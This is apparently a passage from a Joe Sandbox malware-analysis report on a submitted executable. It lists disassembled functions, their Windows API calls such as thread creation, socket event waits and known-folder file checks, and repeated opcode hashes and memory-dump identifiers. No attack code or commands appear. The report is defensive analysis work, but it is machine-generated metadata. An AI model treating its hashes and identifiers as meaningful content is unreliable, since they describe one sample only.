                                                                            • Opcode ID: 4ef99debcadfdcecb3433f75b9a0fe794b6cec0601b21e23afb445cc8b992cdc
                                                                            • Instruction ID: a227cb93c50539fd17ee354a928bd2b381f3ca37a01c1a54fff8af9c16a06d9f
                                                                            • Opcode Fuzzy Hash: 4ef99debcadfdcecb3433f75b9a0fe794b6cec0601b21e23afb445cc8b992cdc
                                                                            • Instruction Fuzzy Hash: A201E871006189FBDF16AF96CC49EEE7F6AEF08358F108020FD1815162D73A9A61DBA1
                                                                            APIs
                                                                            • _malloc.LIBCMT ref: 007E4212
                                                                              • Part of subcall function 007E4619: __FF_MSGBANNER.LIBCMT ref: 007E4632
                                                                              • Part of subcall function 007E4619: __NMSG_WRITE.LIBCMT ref: 007E4639
                                                                              • Part of subcall function 007E4619: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,007C5B93,?), ref: 007E465E
                                                                            • std::exception::exception.LIBCMT ref: 007E4247
                                                                            • std::exception::exception.LIBCMT ref: 007E4261
                                                                            • __CxxThrowException@8.LIBCMT ref: 007E4272
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                                            • String ID: Ea}
                                                                            • API String ID: 615853336-3678585182
                                                                            • Opcode ID: 10a7884988dd03ba4faae3aa249ea20ad39ed9584d0ad495fc985d03817bb016
                                                                            • Instruction ID: 1712c705f11c299bed5eacc9d9ec9a02ba3ffa6767fe52c0af6640c32a3f5d32
                                                                            • Opcode Fuzzy Hash: 10a7884988dd03ba4faae3aa249ea20ad39ed9584d0ad495fc985d03817bb016
                                                                            • Instruction Fuzzy Hash: 8AF0F47150228CEACB04EB66EC0B96E37EDBB58318F100415F628A6291EFBC9A00C691
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,007C108E), ref: 007DC1EB
                                                                            • GetProcAddress.KERNEL32(007C108E,IsWow64Process), ref: 007DC204
                                                                            • GetCurrentProcess.KERNEL32(00000000), ref: 007DC220
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AddressCurrentHandleModuleProcProcess
                                                                            • String ID: IsWow64Process$KERNEL32.DLL
                                                                            • API String ID: 4190356694-1193389583
                                                                            • Opcode ID: c7302a1763b3c0a683f2ec95eba9b2dd774aad0cc0696561cc90c0a072f711b3
                                                                            • Instruction ID: aa2d5237a801441e68e81506000e7f6214494b5776899e717af9586737ce5ce0
                                                                            • Opcode Fuzzy Hash: c7302a1763b3c0a683f2ec95eba9b2dd774aad0cc0696561cc90c0a072f711b3
                                                                            • Instruction Fuzzy Hash: 9FF0A5B5D0520CFBCB14EFE4D949BADBBB8AB08311F108095E905A3341DB785A45DF55
                                                                            APIs
                                                                            • __getptd.LIBCMT ref: 007E73D9
                                                                              • Part of subcall function 007E81BE: __getptd_noexit.LIBCMT ref: 007E81C1
                                                                              • Part of subcall function 007E81BE: __amsg_exit.LIBCMT ref: 007E81CE
                                                                            • __getptd.LIBCMT ref: 007E73EA
                                                                            • __getptd.LIBCMT ref: 007E73F8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                            • String ID: MOC$RCC
                                                                            • API String ID: 803148776-2084237596
                                                                            • Opcode ID: ed8bd0ab92faa1f54095003defd2a49c59da4fdb40cb08683ccfb0fcb8a2e0cc
                                                                            • Instruction ID: b00195dc5e69b3524e157d8e896e2760b2a16a3e59049deea6b075c241025eb2
                                                                            • Opcode Fuzzy Hash: ed8bd0ab92faa1f54095003defd2a49c59da4fdb40cb08683ccfb0fcb8a2e0cc
                                                                            • Instruction Fuzzy Hash: 9AE0123410A2C9CFD7549B66C18A7683695FB4D319F1900A5E40CCB263DB7CD951D543
                                                                            APIs
                                                                            • LoadLibraryW.KERNEL32(USER32.DLL,?,?,007C1089), ref: 007C9C9B
                                                                            • GetProcAddress.KERNEL32(00000000,SetProcessDPIAware), ref: 007C9CB3
                                                                            • FreeLibrary.KERNEL32(00000000), ref: 007C9CCC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Library$AddressFreeLoadProc
                                                                            • String ID: SetProcessDPIAware$USER32.DLL
                                                                            • API String ID: 145871493-772676101
                                                                            • Opcode ID: 918a165b08a5d92ffc616dec2ec63cea0b0fd037df3640153a4e869603431851
                                                                            • Instruction ID: 50bfc5186dd595bc2ccac8a434cb579f7e22b1fea89316041c005d50e5f8b3ee
                                                                            • Opcode Fuzzy Hash: 918a165b08a5d92ffc616dec2ec63cea0b0fd037df3640153a4e869603431851
                                                                            • Instruction Fuzzy Hash: 9BE0C975D0020CEBCB14EFF4D94DAADBBB4AB08301F108198E905A2251DA795B89DB55
                                                                            APIs
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007D6DC7
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007D6DF9
                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 007D6E17
                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_0000E020,-00839F18,00000004,00000000), ref: 007D6E4C
                                                                            • ResumeThread.KERNEL32(00000000), ref: 007D6E8C
                                                                            • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 007D6EF9
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007D6F31
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007D6F63
                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 007D6F81
                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_0000E020,-00839F18,00000004,00000000), ref: 007D6FB5
                                                                            • ResumeThread.KERNEL32(00000000), ref: 007D6FF5
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseCreateHandleThread$EventResume$ObjectSingleWait
                                                                            • String ID:
                                                                            • API String ID: 738346648-0
                                                                            • Opcode ID: 384dd4f8168bc25edb4eda0113c691ea8c1f636115960df7804ae55b1ef4cfe3
                                                                            • Instruction ID: 2770c415f7bcce571425b8a67487ec6669264f678e7de33bce933e6b83828c20
                                                                            • Opcode Fuzzy Hash: 384dd4f8168bc25edb4eda0113c691ea8c1f636115960df7804ae55b1ef4cfe3
                                                                            • Instruction Fuzzy Hash: CC415A75B002058FCF08CB58C999BBEB7B2FBE4304F558529E156AF2D5DB749841CBA0
                                                                            APIs
                                                                            • WSACreateEvent.WS2_32 ref: 007E0876
                                                                            • WSAEventSelect.WS2_32(?,00000000,00000002), ref: 007E0893
                                                                            • WSAWaitForMultipleEvents.WS2_32(00000001,?,00000000,00000001,00000000), ref: 007E08D3
                                                                            • WSACloseEvent.WS2_32(00000000), ref: 007E08E0
                                                                            • WSACloseEvent.WS2_32(00000000), ref: 007E0939
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Event$Close$CreateEventsMultipleSelectWait
                                                                            • String ID:
                                                                            • API String ID: 2166016019-0
                                                                            • Opcode ID: 2b42aff95f3bb0e1b6189b8d71efe679b1340efb6acad2a812a715afd1785087
                                                                            • Instruction ID: add5c602a72133e07326441210e062696a57f847880a515a70a14ff5e059e1c9
                                                                            • Opcode Fuzzy Hash: 2b42aff95f3bb0e1b6189b8d71efe679b1340efb6acad2a812a715afd1785087
                                                                            • Instruction Fuzzy Hash: DC213EB4901309EFDF10CFA5D948BAEB7B5BF49310F104558E90567282C7B9AE81DFA1
                                                                            APIs
                                                                            • WSACreateEvent.WS2_32 ref: 007E0796
                                                                            • WSAEventSelect.WS2_32(?,00000000,00000001), ref: 007E07B3
                                                                            • WSAWaitForMultipleEvents.WS2_32(00000001,?,00000000,00000001,00000000), ref: 007E07F3
                                                                            • WSACloseEvent.WS2_32(00000000), ref: 007E0800
                                                                            • WSACloseEvent.WS2_32(00000000), ref: 007E0859
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Event$Close$CreateEventsMultipleSelectWait
                                                                            • String ID:
                                                                            • API String ID: 2166016019-0
                                                                            • Opcode ID: 9ad5602e7d45b407dde5475b902a036e79ea0bb2151d8e548ab86ea893522d89
                                                                            • Instruction ID: 3ff0b6fca7f58c96b5554643faffa5a1b4bc0cfe436ce4d46e84c1368b0a57be
                                                                            • Opcode Fuzzy Hash: 9ad5602e7d45b407dde5475b902a036e79ea0bb2151d8e548ab86ea893522d89
                                                                            • Instruction Fuzzy Hash: 8D214AB4901309EFDF10CFA5D948BAEB7B4BF49300F208559E80567281C7B99E80DBE1
                                                                            APIs
                                                                            • _malloc.LIBCMT ref: 007EE472
                                                                              • Part of subcall function 007E4619: __FF_MSGBANNER.LIBCMT ref: 007E4632
                                                                              • Part of subcall function 007E4619: __NMSG_WRITE.LIBCMT ref: 007E4639
                                                                              • Part of subcall function 007E4619: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,007C5B93,?), ref: 007E465E
                                                                            • _free.LIBCMT ref: 007EE485
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocateHeap_free_malloc
                                                                            • String ID:
                                                                            • API String ID: 1020059152-0
                                                                            • Opcode ID: 7ede49b8c3d5b0c87a1ce64bce5611abd82f638062a1bc065fdbddbdabb4d221
                                                                            • Instruction ID: 207bb179c0b4ed3886f6f72c52070dfcb06e191954d80acc1ac5972db3a63a7e
                                                                            • Opcode Fuzzy Hash: 7ede49b8c3d5b0c87a1ce64bce5611abd82f638062a1bc065fdbddbdabb4d221
                                                                            • Instruction Fuzzy Hash: 4611AB334076D5EBCB252B77AC0865A3BA9AB4D3A0B208825F94996291DE3C8841C794
                                                                            APIs
                                                                            • LocalAlloc.KERNEL32(00000040,00000018), ref: 007E284A
                                                                              • Part of subcall function 007CFE20: SHGetKnownFolderPath.SHELL32(?,00000000,00000000,?), ref: 007CFE74
                                                                              • Part of subcall function 007CFE20: lstrlenW.KERNEL32(?), ref: 007CFE86
                                                                              • Part of subcall function 007CFE20: lstrlenW.KERNEL32(00831110), ref: 007CFE99
                                                                              • Part of subcall function 007CFE20: LocalAlloc.KERNEL32(00000040,?), ref: 007CFEB2
                                                                              • Part of subcall function 007CFE20: __snwprintf.LIBCMT ref: 007CFEDA
                                                                              • Part of subcall function 007CFE20: lstrlenW.KERNEL32(00000000), ref: 007CFEE6
                                                                              • Part of subcall function 007CFE20: CoTaskMemFree.COMBASE(?), ref: 007CFEF5
                                                                            • GetFileAttributesExW.KERNEL32(00000000,00000000,?), ref: 007E287D
                                                                            • LocalFree.KERNEL32(00000000), ref: 007E28B8
                                                                            • LocalFree.KERNEL32(00000000), ref: 007E28C7
                                                                            • LocalFree.KERNEL32(00000000), ref: 007E28D1
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Local$Free$lstrlen$Alloc$AttributesFileFolderKnownPathTask__snwprintf
                                                                            • String ID:
                                                                            • API String ID: 1368272246-0
                                                                            • Opcode ID: 050e032e2c37866efba06556f37a56ac5495f4966d7d2287fa61776a559187cb
                                                                            • Instruction ID: ae2b0d7b09482ab7e4f5dd407f8f25d065bf41c452ed1ca759d38e29979d5744
                                                                            • Opcode Fuzzy Hash: 050e032e2c37866efba06556f37a56ac5495f4966d7d2287fa61776a559187cb
                                                                            • Instruction Fuzzy Hash: FA21B679E00208EFDB04DF99D949AADBBB5FF8C300F108599E905A7361D774AA41DF60
                                                                            APIs
                                                                              • Part of subcall function 007C81C0: LocalAlloc.KERNEL32(00000040,0000FFFE,?,?,007C8D2B,007D6B10,00000000), ref: 007C81EB
                                                                              • Part of subcall function 007C81C0: LocalAlloc.KERNEL32(00000040,0000FFFE,?,?,007C8D2B), ref: 007C8205
                                                                              • Part of subcall function 007C81C0: wnsprintfW.SHLWAPI ref: 007C8235
                                                                              • Part of subcall function 007C81C0: wnsprintfW.SHLWAPI ref: 007C8251
                                                                              • Part of subcall function 007C81C0: LocalFree.KERNEL32(00000000), ref: 007C8A43
                                                                              • Part of subcall function 007C1C60: _wcsrchr.LIBCMT ref: 007C1C6C
                                                                            • GetFileAttributesW.KERNEL32(00000000), ref: 007C9630
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C963F
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C9649
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C965A
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C9664
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Local$Free$Allocwnsprintf$AttributesFile_wcsrchr
                                                                            • String ID:
                                                                            • API String ID: 3823319188-0
                                                                            • Opcode ID: b59e385f98b442c76e8f58e2d6e982526201997cc0c0c2963838d1fa62bc1ce3
                                                                            • Instruction ID: 7035bbec266a111c574b8e244e2206b9bbd4980377c496541a06691c8dc31ebf
                                                                            • Opcode Fuzzy Hash: b59e385f98b442c76e8f58e2d6e982526201997cc0c0c2963838d1fa62bc1ce3
                                                                            • Instruction Fuzzy Hash: B8111E7A900208FBCB44DBA4D94CE9E7B78AF88310F10459CF605E7280DA399A44CB51
                                                                            APIs
                                                                            • SetEvent.KERNEL32(?), ref: 007DC915
                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 007DC924
                                                                            • CloseHandle.KERNEL32(?), ref: 007DC931
                                                                            • CloseHandle.KERNEL32(?), ref: 007DC93E
                                                                            • LocalFree.KERNEL32(00000000), ref: 007DC958
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandle$EventFreeLocalObjectSingleWait
                                                                            • String ID:
                                                                            • API String ID: 3879024238-0
                                                                            • Opcode ID: 6d4e1bfca27d165f3dce1a099c062fbc797a44c112e62c13100913a81081996d
                                                                            • Instruction ID: 253623ed1f0aa518fc1bf362027ee9378236686e44e68bac29c4a3204fc407a5
                                                                            • Opcode Fuzzy Hash: 6d4e1bfca27d165f3dce1a099c062fbc797a44c112e62c13100913a81081996d
                                                                            • Instruction Fuzzy Hash: 1911BE79A04208EFCB04DF94D988DADBBB5FF48711F20C289E90967395DB38AE41DB54
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Event
                                                                            • String ID:
                                                                            • API String ID: 4201588131-0
                                                                            • Opcode ID: 4eaa083b4ecb2962536b86e232c8a3aa9cd048b8f7afa5db1ce3a86c6e14d62c
                                                                            • Instruction ID: cda02a55713524a9f4034e6d4a5abd37bc0473956a8a245a8bca44c1b8d48c4e
                                                                            • Opcode Fuzzy Hash: 4eaa083b4ecb2962536b86e232c8a3aa9cd048b8f7afa5db1ce3a86c6e14d62c
                                                                            • Instruction Fuzzy Hash: 0811A474A00209EFCB04DF64D99496ABBB6FB89315F2089A9E81197310D775AE50DF90
                                                                            APIs
                                                                              • Part of subcall function 007D3350: LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 007D3364
                                                                              • Part of subcall function 007D3350: LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 007D3385
                                                                              • Part of subcall function 007D3350: SHGetKnownFolderPath.SHELL32(007F7C30,00000000,00000000,00000000), ref: 007D33AC
                                                                              • Part of subcall function 007D3350: lstrlenW.KERNEL32(00000000), ref: 007D33BA
                                                                              • Part of subcall function 007D3350: __snwprintf.LIBCMT ref: 007D33E4
                                                                              • Part of subcall function 007D3350: __snwprintf.LIBCMT ref: 007D33FE
                                                                              • Part of subcall function 007D3350: LocalFree.KERNEL32(00000000), ref: 007D340A
                                                                              • Part of subcall function 007D3350: CoTaskMemFree.COMBASE(00000000), ref: 007D3414
                                                                            • GetFileAttributesW.KERNEL32(00000000), ref: 007D32CF
                                                                            • LocalFree.KERNEL32(00000000), ref: 007D32E2
                                                                            • GetFileAttributesW.KERNEL32(00000000), ref: 007D3312
                                                                            • LocalFree.KERNEL32(00000000), ref: 007D3325
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
